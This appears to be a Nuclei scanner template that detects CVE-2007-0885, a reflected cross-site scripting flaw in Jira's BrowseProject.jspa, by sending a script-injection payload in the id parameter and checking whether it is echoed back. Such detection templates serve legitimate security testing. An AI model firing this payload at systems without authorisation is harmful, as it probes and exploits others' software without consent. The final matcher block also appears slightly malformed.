CVE-2007-0885.yaml

id: CVE-2007-0885

info:
  name: Rainbow.Zen Jira XSS
  description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
  reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
  author: geeknik
  severity: medium
  tags: cve,cve2007,jira,xss

requests:
  - method: GET
    path:
      - "{{BaseURL}}/jira/secure/BrowseProject.jspa?id=\"><script>alert('{{randstr}}')</script>"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "\"><script>alert('{{randstr}}')</script>"
      - type: status
        status:
          - 200
      - type: word
        part: header
          - "text/html"